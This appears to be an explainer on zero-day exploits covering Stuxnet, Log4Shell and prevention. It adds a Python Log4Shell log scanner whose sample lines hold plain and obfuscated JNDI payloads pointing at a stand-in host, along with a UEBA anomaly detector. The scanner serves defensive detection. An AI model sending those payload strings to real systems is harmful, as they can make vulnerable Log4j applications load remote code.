What is a zero-day exploit?

A zero-day exploit is a cyberattack vector or technique that takes advantage of an unknown or unaddressed security flaw in computer software, hardware or firmware. ‘Zero day’ refers to the fact that the software or device vendor has had zero days to fix the flaw: malicious actors can already use it to gain access to vulnerable systems before any patch exists.

The unknown or unaddressed vulnerability is referred to as a zero-day vulnerability or zero-day threat. A zero-day attack is when a malicious actor uses a zero-day exploit to plant malware, steal data, or otherwise cause damage to users, organizations or systems.

A similar but separate concept, zero-day malware, is a virus or other form of malware whose signature is unknown or not yet available, and which is therefore undetectable by many antivirus solutions and other signature-based threat detection technologies.

IBM’s X-Force threat intelligence team has recorded 7,327 zero-day vulnerabilities since 1988. While this amounts to just three percent of all recorded security vulnerabilities, zero-day vulnerabilities—particularly those in widely-used operating systems or computing devices—are among the most severe security risks, because they leave huge numbers of users or entire organizations wide open to cybercrime until the vendor or the cybersecurity community identifies the problem and releases a solution.

The zero-day lifecycle

A zero-day vulnerability exists in a version of an operating system, app or device from the moment that version is released, but the software vendor or hardware manufacturer doesn’t know it. The vulnerability can lie undetected for days, months or years until someone finds it.

In the best-case scenario, security researchers or software developers find the flaw before threat actors do. Sometimes, however, hackers get to the vulnerability first.

Regardless of who discovers the flaw, it often becomes public knowledge soon after. Vendors and security professionals typically tell customers so they can take precautions. Hackers may circulate the threat among themselves, and researchers may learn about it from watching cybercriminal activity. Some vendors may keep a vulnerability secret until they’ve developed a software update or other fix, but this can be a gamble—if hackers find the flaw before vendors patch it, organizations can be caught off guard.

Knowledge of any new zero-day flaw kicks off a race between security professionals working on a fix, and hackers developing a zero-day exploit that leverages the vulnerability to break into a system. Once hackers develop a workable zero-day exploit, they use it to launch a cyberattack.

Hackers can often develop exploits faster than security teams can develop patches. By one estimate (link resides outside ibm.com), exploits are usually available within 14 days of a vulnerability being disclosed. However, once zero-day attacks start, patches often follow in just a few days, because vendors can use information from the attacks to pinpoint the flaw they need to fix. So, while zero-day vulnerabilities are dangerous, the window in which a flaw is both exploited and unpatched is usually short. The caveat for defenders is that a released patch closes the window only once it is applied: an organization that has not yet updated remains exposed to what is, for it, still a zero-day.

Examples of zero-day attacks

Stuxnet

Stuxnet was a sophisticated computer worm that exploited four different zero-day vulnerabilities in Microsoft Windows to spread and to gain elevated privileges. Discovered in 2010, Stuxnet was used in a series of attacks on nuclear facilities in Iran. Once the worm had breached a plant’s computer systems, it targeted the Siemens programmable logic controllers (PLCs) that drove the centrifuges used to enrich uranium and manipulated their rotation speeds until the centrifuges failed. In total, Stuxnet is estimated to have damaged about 1,000 centrifuges.

Researchers believe the US and Israeli governments worked together to build Stuxnet, but this has not been confirmed.


Log4Shell

Log4Shell was a zero-day vulnerability in Log4j, an open-source Java logging library. When a vulnerable Log4j 2 version logged attacker-controlled text containing a JNDI lookup string, it would connect to a server named in that string and load code from it, giving the attacker unauthenticated remote code execution in any application that logged such input. Because Log4j is embedded in popular software such as Apple iCloud and Minecraft, hundreds of millions of devices were at risk. The flaw, tracked as CVE-2021-44228, received the highest possible CVSS severity score, 10 out of 10.

The Log4Shell flaw had been present since 2013, but hackers didn’t start exploiting it until 2021. A fixed version was released shortly after disclosure, but security researchers detected more than 100 Log4Shell attacks per minute at the peak (link resides outside ibm.com), and exploitation continued long afterwards against organizations that had not yet found and updated every bundled copy of the library.
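To make the mechanism concrete, here is an added example (not code from the original page, from IBM or from the Log4j project) that scans web server log lines for the JNDI lookup strings used in Log4Shell attacks. Attackers obfuscated the payload with nested Log4j lookups such as ${lower:j}, ${::-j} and ${env:UNSET:-j} so that a plain search for "${jndi:" would miss it, so the scanner first resolves those nested lookups the way Log4j 2 would and only then searches for the resolved ${jndi:...} pattern. The log lines and the 203.0.113.x addresses are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not real traffic; 203.0.113.x is a documentation range).
# Lines 1-4 carry JNDI lookup strings in the query string or User-Agent, plain and obfuscated;
# lines 0 and 5 are benign, and line 5 contains a harmless ${...} token to test for false positives.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:12:44 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:13:01 +0000] "GET /login?user=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:03:13:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:r}mi://203.0.113.7/x}"',
    '10.0.0.9 - - [10/Dec/2021:03:13:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/x}"',
    '10.0.0.9 - - [10/Dec/2021:03:13:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}ldap://203.0.113.7/x}"',
    '10.0.0.12 - - [10/Dec/2021:03:14:00 +0000] "GET /price?total=${amount} HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

# Innermost Log4j-style lookup: ${...} whose body contains no further $, { or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup with an optional scheme (ldap, ldaps, rmi, dns, iiop, ...).
# Log4j lower-cases the lookup prefix, so the match is case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(?:([a-z]+)\s*:)?", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Evaluate one innermost lookup the way the attacker relies on Log4j 2 evaluating it.

    Covers the obfuscation forms assumed for this example: ${lower:x} / ${upper:x},
    ${::-x} (empty lookup whose default value is x) and ${env:UNSET:-x} (default used
    because the variable is not set). Any other lookup returns None and is left in place.
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """Resolve nested lookups from the inside out until only unresolvable ones (e.g. jndi) remain."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line whose normalized form contains a JNDI lookup."""
    findings: List[Dict[str, object]] = []
    for idx, line in enumerate(lines):
        norm = normalize(line)
        m = JNDI_LOOKUP.search(norm)
        if not m:
            continue
        end = norm.find("}", m.start())
        snippet = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        findings.append({
            "line": idx,
            "scheme": (m.group(1) or "").lower() or None,
            "normalized": snippet,
            "raw": line,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: scheme={f['scheme']} lookup={f['normalized']}")
```

Run a scanner like this with tooling that does not itself log through a vulnerable Log4j 2 build; feeding these strings into a vulnerable logger would trigger the very lookup being hunted. A hit records an attempt, not a confirmed compromise, and it is no substitute for finding and updating every bundled copy of log4j-core.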

2022 Chrome attacks

In early 2022, North Korean hackers exploited a zero-day remote code execution vulnerability in the Google Chrome browser. The hackers used phishing emails to send victims to spoofed sites, which used the Chrome vulnerability to install spyware and remote access malware on victims’ machines. The vulnerability was patched after it came to light, but the hackers covered their tracks well, and researchers don’t know exactly what data was stolen.

Why threat actors seek zero-day vulnerabilities

Zero-day attacks are some of the most difficult cyberthreats to combat. Hackers can exploit zero-day vulnerabilities before their targets even know about them, allowing threat actors to sneak into networks undetected.

Even if the vulnerability is public knowledge, it may be a while before software providers can release a patch, leaving organizations exposed in the meantime. 

In recent years, hackers have exploited zero-day vulnerabilities more frequently. A 2022 Mandiant report found that more zero-day vulnerabilities were exploited in 2021 alone than in all of 2018-2020 combined (link resides outside ibm.com).

The rise in zero-day attacks is likely tied to the fact that company networks are growing more complex. Today, organizations rely on a mix of cloud and on-premises apps, company-owned and employee-owned devices, and Internet of Things (IoT) and operational technology (OT) devices. All of these expand the size of an organization’s attack surface, and zero-day vulnerabilities could be lurking in any of them.

Because zero-day flaws offer such valuable opportunities to hackers, cybercriminals now trade zero-day vulnerabilities and zero-day exploits on the black market for lavish sums. For example, in 2020, hackers were selling Zoom zero-days for as much as USD 500,000 (link resides outside ibm.com). 

Nation-state actors are also known to seek out zero-day flaws. Many choose not to disclose the zero-days they find, preferring instead to craft their own secret zero-day exploits for use against adversaries. Many vendors and security researchers have criticized this practice, arguing that it puts unwitting organizations at risk.

Preventing zero-day exploits and attacks

Security teams are often at a disadvantage with zero-day vulnerabilities. Because these flaws are unknown and unpatched, organizations can’t account for them in cybersecurity risk management or vulnerability mitigation efforts. 

However, there are steps companies can take to uncover more vulnerabilities and lessen the impact of zero-day attacks.

Patch management: Vendors rush to put out security patches as soon as they learn about zero-days, but many organizations neglect to apply these patches quickly. A formal patch management program can help security teams stay on top of these critical patches.

Vulnerability management: In-depth vulnerability assessments and penetration tests can help companies find zero-day vulnerabilities in their systems before hackers do. 

Attack surface management (ASM): ASM tools allow security teams to identify all assets in their networks, including forgotten or unmanaged ones, and examine them for vulnerabilities. ASM tools assess the network from a hacker’s perspective, focusing on how threat actors are likely to exploit assets to gain access. ASM does not reveal flaws nobody knows about, but by showing which assets and software versions are exposed, it tells a security team where a newly disclosed zero-day actually matters and what must be patched first.

Threat intelligence feeds: Security researchers are often among the first to flag zero-day vulnerabilities. Organizations that stay updated on external threat intelligence may hear about new zero-day vulnerabilities sooner.

Anomaly-based detection methods: Zero-day malware can evade signature-based detection methods, but tools that baseline normal behavior and use statistics or machine learning to spot deviations in real time can often catch zero-day attacks, because they key on what the attacker does rather than on what the exploit looks like. Common anomaly-based detection solutions include user and entity behavior analytics (UEBA), extended detection and response (XDR) platforms, endpoint detection and response (EDR) tools, and some intrusion detection and intrusion prevention systems.

Zero trust architecture: If a hacker exploits a zero-day vulnerability to break into a network, zero trust architecture can limit the damage. Zero trust uses continuous authentication, least-privilege access and network segmentation to prevent lateral movement and block malicious actors from reaching sensitive resources.
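As an added example (not code from the original page or from any IBM product), the following Python contrasts the two detection approaches described in the anomaly-based detection item above: a signature check that can only recognize file hashes already on a blocklist, and a UEBA-style baseline that scores an account’s session by how far it departs from that account’s own history. The hash blocklist, the 30-day baseline, the new events and the scoring weights are all constructed for the example.

```python
import hashlib
import statistics
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# --- Signature-based detection ---------------------------------------------------
# Constructed blocklist: hashes of two "known" samples. A zero-day sample has no entry
# here, so a pure signature check cannot see it no matter how malicious it is.
KNOWN_BAD_SHA256 = {
    hashlib.sha256(b"known-sample-A").hexdigest(),
    hashlib.sha256(b"known-sample-B").hexdigest(),
}


def signature_match(file_bytes: bytes) -> bool:
    """Return True only if the file's hash is already on the blocklist."""
    return hashlib.sha256(file_bytes).hexdigest() in KNOWN_BAD_SHA256


# --- Anomaly-based detection (UEBA style) ----------------------------------------
@dataclass(frozen=True)
class Event:
    user: str
    host: str
    hour: int        # local hour of day, 0-23
    bytes_out: int   # bytes sent to external destinations during the session


@dataclass
class UserProfile:
    hosts: Set[str]
    hours: Set[int]
    mean_out: float
    stdev_out: float


def build_baseline(events: Iterable[Event]) -> Dict[str, UserProfile]:
    """Learn, per user, the hosts and hours seen and the distribution of outbound volume."""
    by_user: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        by_user[e.user].append(e)
    profiles: Dict[str, UserProfile] = {}
    for user, evs in by_user.items():
        outs = [e.bytes_out for e in evs]
        profiles[user] = UserProfile(
            hosts={e.host for e in evs},
            hours={e.hour for e in evs},
            mean_out=statistics.fmean(outs),
            stdev_out=statistics.pstdev(outs) if len(outs) > 1 else 0.0,
        )
    return profiles


def score_event(e: Event, profiles: Dict[str, UserProfile]) -> int:
    """Score how far an event departs from the user's baseline (higher = more suspicious)."""
    p = profiles.get(e.user)
    if p is None:
        return 4  # no history at all: treat an account never seen before as highly suspicious
    score = 0
    if e.host not in p.hosts:
        score += 1  # logon to a host this user has never touched
    if e.hour not in p.hours:
        score += 1  # activity outside the user's normal working hours
    if p.stdev_out > 0 and (e.bytes_out - p.mean_out) / p.stdev_out > 3:
        score += 2  # outbound volume more than three standard deviations above normal
    return score


ALERT_THRESHOLD = 2  # illustrative weight; tune against real false-positive rates


def detect(events: Iterable[Event], profiles: Dict[str, UserProfile]) -> List[Event]:
    """Return the events that cross the alert threshold."""
    return [e for e in events if score_event(e, profiles) >= ALERT_THRESHOLD]


# Constructed 30-day baseline for one user: one workstation, office hours, 10-20 MB out per hour.
BASELINE_EVENTS = [
    Event("alice", "ws-alice", hour, 10_000_000 + ((day * 7 + hour) % 11) * 1_000_000)
    for day in range(30) for hour in range(8, 19)
]

# Constructed new events: routine activity, a late but ordinary session, and what a foothold
# gained through a zero-day might look like from the same account (new host, 3 a.m., 900 MB out).
NEW_EVENTS = [
    Event("alice", "ws-alice", 14, 12_000_000),
    Event("alice", "ws-alice", 20, 15_000_000),
    Event("alice", "srv-db-01", 3, 900_000_000),
]

if __name__ == "__main__":
    print("signature hit on unseen payload:", signature_match(b"never-seen-payload"))
    profiles = build_baseline(BASELINE_EVENTS)
    for e in NEW_EVENTS:
        print(f"{e.host} at {e.hour:02d}:00 -> score {score_event(e, profiles)}")
    print("alerts:", detect(NEW_EVENTS, profiles))
```

The weights and the three-standard-deviation cut-off are illustrative, and production UEBA models are far richer, but the principle is the same: the detection never needs to know which exploit was used, only what normal looks like for the user, which is exactly the knowledge a signature check lacks for a sample whose hash has never been seen.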
